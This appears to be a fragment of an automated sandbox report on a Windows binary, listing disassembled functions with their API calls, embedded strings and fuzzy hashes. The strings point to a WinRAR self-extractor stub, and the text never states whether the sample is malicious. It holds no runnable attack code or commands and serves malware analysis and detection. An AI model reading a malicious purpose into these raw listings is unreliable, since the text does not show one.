                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID: 0d
                                                                                                                        • API String ID: 776569668-2809447700
                                                                                                                        • Opcode ID: 1c6810ee090d2eb8b81f53ca68c51e7dd50d696facc525ecad7cfe27ba0e41e5
                                                                                                                        • Instruction ID: 8fb843314f97c79526b47c27d5a9f8fc1aec9d9f69eaad49c8007af893010239
                                                                                                                        • Opcode Fuzzy Hash: 1c6810ee090d2eb8b81f53ca68c51e7dd50d696facc525ecad7cfe27ba0e41e5
                                                                                                                        • Instruction Fuzzy Hash: 9611A476110109AFCB01EF54CA42DDA3BBDEF14350B9164A6FA08AF262DE32DA50DF84
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00EA9736
                                                                                                                        • _wcslen.LIBCMT ref: 00EA97D6
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00EA97E5
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00EA9806
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EA982D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                        • String ID: Fjun$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                        • API String ID: 1777411235-1684715023
                                                                                                                        • Opcode ID: 6b3a77ceb3cb7ce07c5a217b57128dfb0d2e9d473a1d74d3a65303bc6c00ebfa
                                                                                                                        • Instruction ID: b3141baa1c7c70cddd233820d7e071e1368b12277d56c836118f3a6c443b9468
                                                                                                                        • Opcode Fuzzy Hash: 6b3a77ceb3cb7ce07c5a217b57128dfb0d2e9d473a1d74d3a65303bc6c00ebfa
                                                                                                                        • Instruction Fuzzy Hash: C73139321083017ED725AB349C06FAB77D89F97310F14111EF402BA1D3EB75EA0982A6
                                                                                                                        APIs
                                                                                                                        • GetWindow.USER32(?,00000005), ref: 00EAD6C1
                                                                                                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 00EAD6ED
                                                                                                                          • Part of subcall function 00EA1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E9C116,00000000,.exe,?,?,00000800,?,?,?,00EA8E3C), ref: 00EA1FD1
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00EAD709
                                                                                                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00EAD720
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00EAD734
                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00EAD75D
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EAD764
                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00EAD76D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                        • String ID: STATIC
                                                                                                                        • API String ID: 3820355801-1882779555
                                                                                                                        • Opcode ID: 9912654b72ca4030b00576cbcdcc435edf545c0bdd28b5308cd9d5503822e652
                                                                                                                        • Instruction ID: 5850fff32933e8eb8a655e4105fdd65e21e3f29b3ce46f59f45ae491aabc490b
                                                                                                                        • Opcode Fuzzy Hash: 9912654b72ca4030b00576cbcdcc435edf545c0bdd28b5308cd9d5503822e652
                                                                                                                        • Instruction Fuzzy Hash: 9D1136726043107FE2216B709C4AFBF769CAF8A711F005122FA52FA0D1DB64AF49C6B5
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        • API String ID: 322700389-393685449
                                                                                                                        • Opcode ID: 4fe9fc0e295ba04303ebdcfbb9200305ff81a97b1e557b9f4def400859b8939e
                                                                                                                        • Instruction ID: 99f06d63fade869bfcbdbc1b0d7f71cf201154527a972d36fd64f56d85218de4
                                                                                                                        • Opcode Fuzzy Hash: 4fe9fc0e295ba04303ebdcfbb9200305ff81a97b1e557b9f4def400859b8939e
                                                                                                                        • Instruction Fuzzy Hash: 39B15771900209EFCF29EFA8C8829EFBBB9EF04314F14615AE9157B212D731DA51CB91
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n
                                                                                                                        • API String ID: 3519838083-140586453
                                                                                                                        • Opcode ID: 69db50b85ffc7b884fbd385267a5899890186c8fc00a16e0b59ce0f9623aab2c
                                                                                                                        • Instruction ID: 02982b42537fa8cd5d0ddc5c4739ad748915ef34b46a5dfcfe1fa834275343a7
                                                                                                                        • Opcode Fuzzy Hash: 69db50b85ffc7b884fbd385267a5899890186c8fc00a16e0b59ce0f9623aab2c
                                                                                                                        • Instruction Fuzzy Hash: 68717B71A00219EFDF18DFA5D895DAEB7B9FF49314B04516DE412B72A0CB31AE42CB60
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E96FAA
                                                                                                                        • _wcslen.LIBCMT ref: 00E97013
                                                                                                                        • _wcslen.LIBCMT ref: 00E97084
                                                                                                                          • Part of subcall function 00E97A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E97AAB
                                                                                                                          • Part of subcall function 00E97A9C: GetLastError.KERNEL32 ref: 00E97AF1
                                                                                                                          • Part of subcall function 00E97A9C: CloseHandle.KERNEL32(?), ref: 00E97B00
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                        • API String ID: 3122303884-3508440684
                                                                                                                        • Opcode ID: f9e83c8ba406a7f70041f8611880e330af1ddfc0f5fd7ed42db1b75786a4c94a
                                                                                                                        • Instruction ID: 8a12788c3249516efc08d5953cb86136acfd35795b995b7f7eb54d5bcf6a76b1
                                                                                                                        • Opcode Fuzzy Hash: f9e83c8ba406a7f70041f8611880e330af1ddfc0f5fd7ed42db1b75786a4c94a
                                                                                                                        • Instruction Fuzzy Hash: FF4118B1D18344BAEF30E7709D82FEFB7AC9F05304F046456FA85B6182D675AA8C8761
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00EAB610
                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00EAB637
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00EAB650
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00EAB661
                                                                                                                        • GetDlgItem.USER32(?,00000065), ref: 00EAB66A
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00EAB67E
                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00EAB694
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                        • String ID: LICENSEDLG
                                                                                                                        • API String ID: 3214253823-2177901306
                                                                                                                        • Opcode ID: 5a5874113f7bc7857aeb1c4320a5a7545c559a08ff582988fba1dfd7ddd19791
                                                                                                                        • Instruction ID: 714031f115dce63c71b721e8911ada91c20b4acf889012415712d4e0aa953b3d
                                                                                                                        • Opcode Fuzzy Hash: 5a5874113f7bc7857aeb1c4320a5a7545c559a08ff582988fba1dfd7ddd19791
                                                                                                                        • Instruction Fuzzy Hash: F421D332604209BFD2119B77ED4AF7B3B6DEBCFB45F115015F600BA0A2CB52A905D635
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,193C2A8D,00000001,00000000,00000000,?,?,00E9AF6C,ROOT\CIMV2), ref: 00EAFD99
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00E9AF6C,ROOT\CIMV2), ref: 00EAFE14
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00EAFE1F
                                                                                                                        • _com_issue_error.COMSUPP ref: 00EAFE48
                                                                                                                        • _com_issue_error.COMSUPP ref: 00EAFE52
                                                                                                                        • GetLastError.KERNEL32(80070057,193C2A8D,00000001,00000000,00000000,?,?,00E9AF6C,ROOT\CIMV2), ref: 00EAFE57
                                                                                                                        • _com_issue_error.COMSUPP ref: 00EAFE6A
                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,00E9AF6C,ROOT\CIMV2), ref: 00EAFE80
                                                                                                                        • _com_issue_error.COMSUPP ref: 00EAFE93
                                                                                                                        Similarity
                                                                                                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1353541977-0
                                                                                                                        • Opcode ID: e42ddf4bd9559884f670a2bf0b130f65da04353736b6bf5f520a1f8a283b8f78
                                                                                                                        • Instruction ID: 80cf6d8ec8029289791df035d0ade95a2bacb2459b162a83a2ced57bccc4a779
                                                                                                                        • Opcode Fuzzy Hash: e42ddf4bd9559884f670a2bf0b130f65da04353736b6bf5f520a1f8a283b8f78
                                                                                                                        • Instruction Fuzzy Hash: 7041E771A00305AFCB109FA9CC45FAFBBE8EB49724F14923AF905FB251D735A90187A4
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E99387
                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00E993AA
                                                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00E993C9
                                                                                                                          • Part of subcall function 00E9C29A: _wcslen.LIBCMT ref: 00E9C2A2
                                                                                                                          • Part of subcall function 00EA1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E9C116,00000000,.exe,?,?,00000800,?,?,?,00EA8E3C), ref: 00EA1FD1
                                                                                                                        • _swprintf.LIBCMT ref: 00E99465
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E994D4
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E99514
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                        • String ID: rtmp%d
                                                                                                                        • API String ID: 3726343395-3303766350
                                                                                                                        • Opcode ID: a8b5b888d621a25167140da51ac845f55747cee5e2cfec90d854cb14c6293794
                                                                                                                        • Instruction ID: be3a729fe2d1ab927e8a6615a6e53af4a98d29b10fbeb6b68d95fa71756c8947
                                                                                                                        • Opcode Fuzzy Hash: a8b5b888d621a25167140da51ac845f55747cee5e2cfec90d854cb14c6293794
                                                                                                                        • Instruction Fuzzy Hash: 404166B1900254AADF21FBA4CD45EDF73BCAF45344F0058A9B649F7152DB389B898B70
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: U$p$z
                                                                                                                        • API String ID: 176396367-3999876168
                                                                                                                        • Opcode ID: 9cdee465b87615dfd32897690991bad3afa849e04a85b2412053f8c8a31458a2
                                                                                                                        • Instruction ID: b3260429683b85f2f4823983e77b6013f7ad572f227e08f1b5f39b5c670dd276
                                                                                                                        • Opcode Fuzzy Hash: 9cdee465b87615dfd32897690991bad3afa849e04a85b2412053f8c8a31458a2
                                                                                                                        • Instruction Fuzzy Hash: C041B471A0066A9FCB11AF788C069EF7BB8EF45310F00406AF945F7255DE30AE498AA5
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00EA9EEE
                                                                                                                        • GetWindowRect.USER32(?,00000000), ref: 00EA9F44
                                                                                                                        • ShowWindow.USER32(?,00000005,00000000), ref: 00EA9FDB
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00EA9FE3
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00EA9FF9
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$RectText
                                                                                                                        • String ID: $RarHtmlClassName
                                                                                                                        • API String ID: 3937224194-266247588
                                                                                                                        • Opcode ID: f3b755102b66b3da21e36cfa4578dedcd04f40a485b566ce7deccd51423f9dfa
                                                                                                                        • Instruction ID: 79dcb7f9131ee56d33479d57b3733b0f712cbf8fd817cc4cfb1efa01d33e7c75
                                                                                                                        • Opcode Fuzzy Hash: f3b755102b66b3da21e36cfa4578dedcd04f40a485b566ce7deccd51423f9dfa
                                                                                                                        • Instruction Fuzzy Hash: B141C031105310AFCB215F75DC88B7BBBA8FF89715F045569F849BA056CB34E908CB61
                                                                                                                        APIs
                                                                                                                        • __aulldiv.LIBCMT ref: 00EA122E
                                                                                                                          • Part of subcall function 00E9B146: GetVersionExW.KERNEL32(?), ref: 00E9B16B
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00EA1251
                                                                                                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00EA1263
                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00EA1274
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA1284
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EA1294
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00EA12CF
                                                                                                                        • __aullrem.LIBCMT ref: 00EA1379
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1247370737-0
                                                                                                                        • Opcode ID: 21ee2f27dc5998425194d51ced7d41c8664791d8fa227a63371eda0a051a720b
                                                                                                                        • Instruction ID: 7f80df30c740564ef37f67587bb9e347f950d67a90c435f54941b8c55f1303f6
                                                                                                                        • Opcode Fuzzy Hash: 21ee2f27dc5998425194d51ced7d41c8664791d8fa227a63371eda0a051a720b
                                                                                                                        • Instruction Fuzzy Hash: 924128B2508305AFC710DF65C88496BBBF9FF88314F04892EF596D6210E739E649CB62
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 00E92536
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                          • Part of subcall function 00EA05DA: _wcslen.LIBCMT ref: 00EA05E0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                        • String ID: ;%u$x%u$xc%u
                                                                                                                        • API String ID: 3053425827-2277559157
                                                                                                                        • Opcode ID: 906e4bacc4a80cfc7d20db32dfcf0e18b3d34af2023a36ff635a30f7ec4ba814
                                                                                                                        • Instruction ID: 93750f90e0afc8430fbe238b6883670f1edfe4b78afcdb430a0d0d0b380fd161
                                                                                                                        • Opcode Fuzzy Hash: 906e4bacc4a80cfc7d20db32dfcf0e18b3d34af2023a36ff635a30f7ec4ba814
                                                                                                                        • Instruction Fuzzy Hash: 59F14870604340ABDF25EF248495BFE7BD95F94304F08296DEE8ABB283CB649945C762
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                        • API String ID: 176396367-3568243669
                                                                                                                        • Opcode ID: 37caa3343ceb13575fc36caed3b7b0786ca2af2ba058d6c88660987c66879be3
                                                                                                                        • Instruction ID: 85834a1bec9fe1539e3f186711270b624bf82265b9ad7835f04e860151ca553b
                                                                                                                        • Opcode Fuzzy Hash: 37caa3343ceb13575fc36caed3b7b0786ca2af2ba058d6c88660987c66879be3
                                                                                                                        • Instruction Fuzzy Hash: 8C516B6670132395DB309A24981177673E0DFAF758F58642AF9C1BF1C3FB65ACC18261
                                                                                                                        APIs
                                                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00EBFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00EBF6CF
                                                                                                                        • __fassign.LIBCMT ref: 00EBF74A
                                                                                                                        • __fassign.LIBCMT ref: 00EBF765
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00EBF78B
                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,00EBFE02,00000000,?,?,?,?,?,?,?,?,?,00EBFE02,00000000), ref: 00EBF7AA
                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000001,00EBFE02,00000000,?,?,?,?,?,?,?,?,?,00EBFE02,00000000), ref: 00EBF7E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1324828854-0
                                                                                                                        • Opcode ID: d94d33540870b37f6949381841cad2db5274f2182baa97efa811fbec93ee4bff
                                                                                                                        • Instruction ID: 84b37557d700b6a3f2c6783d36bb3257da494aa7edda632900304ddb381ce18d
                                                                                                                        • Opcode Fuzzy Hash: d94d33540870b37f6949381841cad2db5274f2182baa97efa811fbec93ee4bff
                                                                                                                        • Instruction Fuzzy Hash: 2B51B5B1D002499FDB14CFA8DC85AEEBBF5EF09300F14516AE955F7251E730AA45CBA0
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 00EACE9D
                                                                                                                          • Part of subcall function 00E9B690: _wcslen.LIBCMT ref: 00E9B696
                                                                                                                        • _swprintf.LIBCMT ref: 00EACED1
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,00ED946A), ref: 00EACEF1
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00EACF22
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00EACFFE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                                        • String ID: %s%s%u
                                                                                                                        • API String ID: 689974011-1360425832
                                                                                                                        • Opcode ID: a578e763b71fcfef794d2b037f78b01346a370c94ef9dd4c6641198ae6584aef
                                                                                                                        • Instruction ID: 0883238dddf6679cd3d7620108de092d8369dd44003b857c26f3885f3ea0022f
                                                                                                                        • Opcode Fuzzy Hash: a578e763b71fcfef794d2b037f78b01346a370c94ef9dd4c6641198ae6584aef
                                                                                                                        • Instruction Fuzzy Hash: 31418471900258AEDF219B50DC45EEA77FCEB09304F4094A7F90AFB141EE70AA49CF61
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EB2937
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00EB293F
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EB29C8
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00EB29F3
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00EB2A48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
